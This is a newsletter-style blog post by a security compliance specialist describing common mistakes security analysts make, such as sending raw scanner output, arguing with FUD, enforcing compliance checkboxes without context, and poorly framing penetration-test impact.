Common Security Analyst Mistakes to Avoid

Successful security analysts understand the context of an organization. They educate colleagues about security risks. They leverage the trust they've earned to guide and advise their colleagues. Here's what NOT to do to achieve success!

Common Security Analyst Mistakes to Avoid

Let me tell you a horror story about a security consultant. That person had been hired for a specific mandate. By the end of it, people were actively running away from him. They asked other security people, such as the person who told me that story, "What can I tell him to make him go away for good?"

Let that sink in. This job's most important output is to convince people to change their behaviours. It's true in every field of information security. How can someone fall so low?

This week, we're going to look at some major blunders security specialists make. If we are aware of these pitfalls, we're in a good spot to avoid being part of a horror story!


"I found a vulnerability in your app, please take action"

Want to make me swear? Use a free "vulnerability scanner" on my employers' websites, spin up ChatGPT to format whatever stupid cipher bad practice the bot finds into an email, and beg me for a bug bounty.

I've seen so many variations on these. Internal scans, external scans, consultant scans, scans from people who've just done an "Ethical hacking 101" YouTube course...

All these share a common trait: running some automated tool and not actually trying to understand the output.

Why is this a blunder?

I don't feel I would need to explain why this is awful, but since people do this so much, even sometimes as Blue team specialists, here I am.

You are wasting someone else's time by being lazy. You are trusting the output of some scanner which has over 90% false positive rates. You are shifting the burden of proof on someone else: "My tool says you're vulnerable". Worse, I could teach my 12-year-old son how to run a vulnerability scanner.

"I'm just doing what I've been told". Well, pardon my French, but your IT manager sucks.

How to fix it

"I've done a scan of your infrastructure. Amongst the findings, this error message caught my attention. Turns out your site returned an unexpected response. I did some testing, and it looks like a potential path traversal vulnerability. This could be a high-impact finding, I advise you to look into it by Friday. If you have any questions let's set up a huddle".

Compare that to: "I've done a scan of your infrastructure. Here's the 10-page report. You need to take action on any medium finding."


Righteousness

In my post Mental Health in Cybersecurity: The Hidden Threat, I told the story of fellow security analysts who went into burnout because they couldn't bear the reckless attitudes of some engineering leaders.

See, information security specialists value ethics and integrity. We protect the citizens using our networks and applications. This is especially relevant whenever these people entrust us with their personal information. Even more if we protect critical infrastructures!

In that context, it is normal to not see the forest for the trees.

I've seen security analysts block a deployment for weeks because of a disagreement over the format of an email notification.

The common trait I've seen from these behaviours is the spread of "FUD" (fear, uncertainty, doubt). "Wait until a breach comes in you'll see!"

Some saw disagreements as an argument to be "won". Others got so angry at "losing" one argument, they started resenting the company.

Why is this a blunder?

There's a fine line between being passionate and letting the profession eat you alive. What worsens the issue is that, as I explained in the Mental health piece, it's the security people who get fired when a breach occurs. So we do have a legitimate reason for righteousness!

This is almost the reverse of the first issue: here, you're bringing too much baggage to a simple problem. The intensity gives a vibe of "crying wolf".

How to fix it

It's a negotiation. What are the hills you die on, what can you compromise on, and why.

What helps me is also thinking about the larger picture: "There are forces beyond my control that will absolutely make this app go online, whatever I do, so anything I gain from this point on in a reasonable timeline is a win". I'm responsible to bring as much data as possible to make my point clear. The outcome is not a personal failure.

Another tip: look at problems as an educator. Instead of "winning" an argument, measure success on how much individuals gained in understanding and security awareness.


Looking for a checkmark

As a compliance specialist, my bread and butter is answering this question from engineers, ops, business analysts, and management: "Can we do this?" As in: is this behaviour allowed by our policies? Hint: most of the time people are actually asking for permission rather than guidance, but that's another debate.

Compliance gets a bad rep because it likes to deal in binaries. All communications must be encrypted. You must disable this protocol. Your passwords must be 8 characters long, have a special character, and... whatever.

Why is this a blunder?

The problem with compliance specialists and internal auditors is sometimes they don't take a step back and ask why do we do this? Take password policies as an example. I believe, like Microsoft, that passwordless is actually better than any password policy. You'd be surprised how many compliance specialists wouldn't take that as an answer: "We need 90 days rotation!"

I'll also venture into some "armchair psychology" if you'll indulge me. Strict compliance requirements speak to an authoritative mindset. "This document says by our bosses says you must do this. Do this". The issue is: this mindset doesn't resonate with developers. I know it's somewhat of a cliché, but it rings true to me: developers feel more "creative-minded", which means they don't deal as well with authority as, say, a military group.

How to fix this?

As I wrote above: it's a negotiation. Every "checkmark" has its story. The requirements fit in a larger picture. Your company has documented risks. Tell this story behind the checkmark. Find alternative solutions, proportional to the risks. Dare to find these grey zones.


Popping a calculator

Whenever penetration testers gain full access to a system, they will use their code execution to "pop" calculator.exe as a sign of triumph.

The problem is, of course, that people do not understand the idea behind the calculator. "So, code execution is opening my applications on my desktop?"

I'm not saying you should show cat videos whenever you break into a website in a pentest. But we need to better frame the impacts of a successful intrusion.

I've often dismissed the idea of doing "hacking demonstrations" as part of security awareness. I've always felt it was portraying security as a "magic" thing. However, given the predictable behaviours of the current cybercrime threats, we should replace the calculators with a "benign" form of ransomware-looking demonstrations, which would give a sense of actual issues.

Still, it's much better than just saying: "I found a vulnerability in your website"...



🥳
Thank you for reading!

If you like my content, subscribe to the newsletter with the form below.

Cheers,
Pierre-Paul